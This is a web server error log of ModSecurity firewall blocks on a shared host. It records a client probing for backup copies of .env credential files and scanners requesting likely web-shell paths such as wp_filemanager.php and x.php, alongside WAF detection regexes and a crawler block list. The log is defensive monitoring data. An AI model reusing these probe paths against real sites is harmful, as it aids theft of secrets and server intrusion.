[Tue May 26 16:51:12.550887 2026] [proxy:error] [pid 823496:tid 823680] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.550963 2026] [proxy_http:error] [pid 823496:tid 823680] [client 208.84.100.197:51748] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.552854 2026] [proxy:error] [pid 823496:tid 823651] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.552914 2026] [proxy_http:error] [pid 823496:tid 823651] [client 208.84.100.197:51764] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.553493 2026] [proxy:error] [pid 823496:tid 823651] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.553528 2026] [proxy_http:error] [pid 823496:tid 823651] [client 208.84.100.197:51764] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.830984 2026] [security2:error] [pid 817651:tid 817896] [client 208.84.100.197:52214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahWCKNlGRCPPN1dS2y3BeQAAAPg"]
[Tue May 26 16:51:12.831026 2026] [security2:error] [pid 823496:tid 823755] [client 208.84.100.197:52198] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahWCKJa08mrtyBNpA4Pj7wAAAH8"]
[Tue May 26 16:51:12.831710 2026] [security2:error] [pid 823496:tid 823644] [client 208.84.100.197:52174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahWCKJa08mrtyBNpA4Pj8AAAABA"]
[Tue May 26 16:51:12.831800 2026] [security2:error] [pid 823496:tid 823731] [client 208.84.100.197:52166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahWCKJa08mrtyBNpA4Pj8gAAAGc"]
[Tue May 26 16:51:12.831938 2026] [security2:error] [pid 817651:tid 817844] [client 208.84.100.197:52202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahWCKNlGRCPPN1dS2y3BewAAAMQ"]
[Tue May 26 16:51:12.832401 2026] [security2:error] [pid 817651:tid 817886] [client 208.84.100.197:52160] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahWCKNlGRCPPN1dS2y3BfAAAAO4"]
[Tue May 26 16:51:12.832533 2026] [security2:error] [pid 817651:tid 817859] [client 208.84.100.197:52190] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahWCKNlGRCPPN1dS2y3BegAAANM"]
[Tue May 26 16:51:12.832961 2026] [proxy:error] [pid 823496:tid 823726] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.833009 2026] [proxy_http:error] [pid 823496:tid 823726] [client 208.84.100.197:52182] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.832382 2026] [security2:error] [pid 817651:tid 817782] [client 208.84.100.197:52156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahWCKNlGRCPPN1dS2y3BfQAAAIY"]
[Tue May 26 16:51:12.833256 2026] [proxy:error] [pid 823496:tid 823718] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.833310 2026] [proxy_http:error] [pid 823496:tid 823718] [client 208.84.100.197:51986] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.833412 2026] [security2:error] [pid 817651:tid 817781] [client 208.84.100.197:52102] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahWCKNlGRCPPN1dS2y3BfwAAAIU"]
[Tue May 26 16:51:12.833654 2026] [proxy:error] [pid 823496:tid 823726] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.833692 2026] [proxy_http:error] [pid 823496:tid 823726] [client 208.84.100.197:52182] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.833772 2026] [security2:error] [pid 817651:tid 817879] [client 208.84.100.197:52088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahWCKNlGRCPPN1dS2y3BgAAAAOc"]
[Tue May 26 16:51:12.833779 2026] [security2:error] [pid 817651:tid 817834] [client 208.84.100.197:52072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahWCKNlGRCPPN1dS2y3BfgAAALo"]
[Tue May 26 16:51:12.833827 2026] [proxy:error] [pid 823496:tid 823715] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.833834 2026] [security2:error] [pid 817651:tid 817887] [client 208.84.100.197:52060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahWCKNlGRCPPN1dS2y3BggAAAO8"]
[Tue May 26 16:51:12.833889 2026] [proxy_http:error] [pid 823496:tid 823715] [client 208.84.100.197:52130] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.833975 2026] [security2:error] [pid 823496:tid 823735] [client 208.84.100.197:52172] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahWCKJa08mrtyBNpA4Pj9AAAAGs"]
[Tue May 26 16:51:12.834163 2026] [proxy:error] [pid 823496:tid 823718] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.834213 2026] [proxy_http:error] [pid 823496:tid 823718] [client 208.84.100.197:51986] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.834228 2026] [proxy:error] [pid 817651:tid 817793] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.834267 2026] [proxy_http:error] [pid 817651:tid 817793] [client 208.84.100.197:52052] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.834464 2026] [security2:error] [pid 817651:tid 817905] [client 208.84.100.197:52140] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahWCKNlGRCPPN1dS2y3BgQAAAQE"]
[Tue May 26 16:51:12.834503 2026] [proxy:error] [pid 823496:tid 823715] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.834539 2026] [security2:error] [pid 823496:tid 823629] [client 208.84.100.197:52116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahWCKJa08mrtyBNpA4Pj9QAAAAE"]
[Tue May 26 16:51:12.834543 2026] [proxy_http:error] [pid 823496:tid 823715] [client 208.84.100.197:52130] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.834694 2026] [security2:error] [pid 823496:tid 823677] [client 208.84.100.197:52112] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahWCKJa08mrtyBNpA4Pj8wAAADE"]
[Tue May 26 16:51:12.834853 2026] [proxy:error] [pid 817651:tid 817793] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.834885 2026] [proxy_http:error] [pid 817651:tid 817793] [client 208.84.100.197:52052] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.835112 2026] [security2:error] [pid 823496:tid 823657] [client 208.84.100.197:52068] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahWCKJa08mrtyBNpA4Pj-AAAAB0"]
[Tue May 26 16:51:12.835342 2026] [security2:error] [pid 817651:tid 817869] [client 208.84.100.197:52038] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahWCKNlGRCPPN1dS2y3BhAAAAN0"]
[Tue May 26 16:51:12.836205 2026] [security2:error] [pid 823496:tid 823734] [client 208.84.100.197:52026] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahWCKJa08mrtyBNpA4Pj-QAAAGo"]
[Tue May 26 16:51:12.836395 2026] [security2:error] [pid 817651:tid 817827] [client 208.84.100.197:52022] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahWCKNlGRCPPN1dS2y3BhgAAALM"]
[Tue May 26 16:51:12.836408 2026] [proxy:error] [pid 817651:tid 817889] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.836453 2026] [proxy_http:error] [pid 817651:tid 817889] [client 208.84.100.197:51996] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.836926 2026] [proxy:error] [pid 817651:tid 817852] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.836966 2026] [proxy:error] [pid 823496:tid 823637] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.836972 2026] [proxy_http:error] [pid 817651:tid 817852] [client 208.84.100.197:51984] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.837012 2026] [proxy_http:error] [pid 823496:tid 823637] [client 208.84.100.197:52010] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.837075 2026] [proxy:error] [pid 817651:tid 817889] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.837105 2026] [proxy_http:error] [pid 817651:tid 817889] [client 208.84.100.197:51996] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.837548 2026] [proxy:error] [pid 817651:tid 817852] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.837581 2026] [proxy_http:error] [pid 817651:tid 817852] [client 208.84.100.197:51984] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.837769 2026] [proxy:error] [pid 823496:tid 823637] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.837814 2026] [proxy_http:error] [pid 823496:tid 823637] [client 208.84.100.197:52010] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:12.850155 2026] [security2:error] [pid 817651:tid 817802] [client 47.128.47.119:37522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/robots.txt"] [unique_id "ahWCKNlGRCPPN1dS2y3BiAAAAJo"]
[Tue May 26 16:51:13.325779 2026] [security2:error] [pid 817651:tid 817786] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCKNlGRCPPN1dS2y3BcgAAAIo"]
[Tue May 26 16:51:13.716445 2026] [security2:error] [pid 823496:tid 823705] [client 20.206.111.149:29520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/file4.php"] [unique_id "ahWCKZa08mrtyBNpA4PkBQAAAE0"]
[Tue May 26 16:51:13.716573 2026] [security2:error] [pid 823496:tid 823705] [client 20.206.111.149:29520] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/file4.php"] [unique_id "ahWCKZa08mrtyBNpA4PkBQAAAE0"]
[Tue May 26 16:51:13.811485 2026] [security2:error] [pid 823496:tid 823666] [client 114.119.139.115:50659] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahWCKZa08mrtyBNpA4PkBgAAACY"], referer: http://glorodavionics.com/beta/index.php?route=account%2Fpassword
[Tue May 26 16:51:13.870618 2026] [security2:error] [pid 817651:tid 817798] [client 20.206.111.203:6127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWCKdlGRCPPN1dS2y3BjgAAAJY"]
[Tue May 26 16:51:13.870777 2026] [security2:error] [pid 817651:tid 817798] [client 20.206.111.203:6127] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWCKdlGRCPPN1dS2y3BjgAAAJY"]
[Tue May 26 16:51:14.095067 2026] [proxy:error] [pid 823496:tid 823684] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:14.095161 2026] [proxy_http:error] [pid 823496:tid 823684] [client 208.84.100.197:52166] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:14.096062 2026] [proxy:error] [pid 823496:tid 823684] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:14.096103 2026] [proxy_http:error] [pid 823496:tid 823684] [client 208.84.100.197:52166] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:14.256175 2026] [security2:error] [pid 823496:tid 823716] [client 20.206.111.203:6139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWCKpa08mrtyBNpA4PkEAAAAFg"]
[Tue May 26 16:51:14.256376 2026] [security2:error] [pid 823496:tid 823716] [client 20.206.111.203:6139] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWCKpa08mrtyBNpA4PkEAAAAFg"]
[Tue May 26 16:51:14.665988 2026] [security2:error] [pid 823496:tid 823688] [client 20.206.111.203:6122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWCKpa08mrtyBNpA4PkFgAAADw"]
[Tue May 26 16:51:14.666090 2026] [security2:error] [pid 823496:tid 823688] [client 20.206.111.203:6122] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWCKpa08mrtyBNpA4PkFgAAADw"]
[Tue May 26 16:51:15.149591 2026] [security2:error] [pid 823496:tid 823683] [client 20.206.111.203:6105] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWCK5a08mrtyBNpA4PkJgAAADc"]
[Tue May 26 16:51:15.149714 2026] [security2:error] [pid 823496:tid 823683] [client 20.206.111.203:6105] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWCK5a08mrtyBNpA4PkJgAAADc"]
[Tue May 26 16:51:15.527668 2026] [security2:error] [pid 823496:tid 823736] [client 117.198.37.168:55437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCK5a08mrtyBNpA4PkLQAAAGw"]
[Tue May 26 16:51:15.527793 2026] [security2:error] [pid 823496:tid 823736] [client 117.198.37.168:55437] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCK5a08mrtyBNpA4PkLQAAAGw"]
[Tue May 26 16:51:15.561002 2026] [security2:error] [pid 823496:tid 823644] [client 20.206.111.203:6128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWCK5a08mrtyBNpA4PkLwAAABA"]
[Tue May 26 16:51:15.561118 2026] [security2:error] [pid 823496:tid 823644] [client 20.206.111.203:6128] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWCK5a08mrtyBNpA4PkLwAAABA"]
[Tue May 26 16:51:15.904889 2026] [security2:error] [pid 823496:tid 823668] [client 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCK5a08mrtyBNpA4PkKAAAKCU"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:15.910712 2026] [security2:error] [pid 823496:tid 823730] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCKpa08mrtyBNpA4PkGQAAAGY"]
[Tue May 26 16:51:16.069685 2026] [security2:error] [pid 817651:tid 817807] [client 20.206.111.203:6033] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWCLNlGRCPPN1dS2y3BnQAAAJ8"]
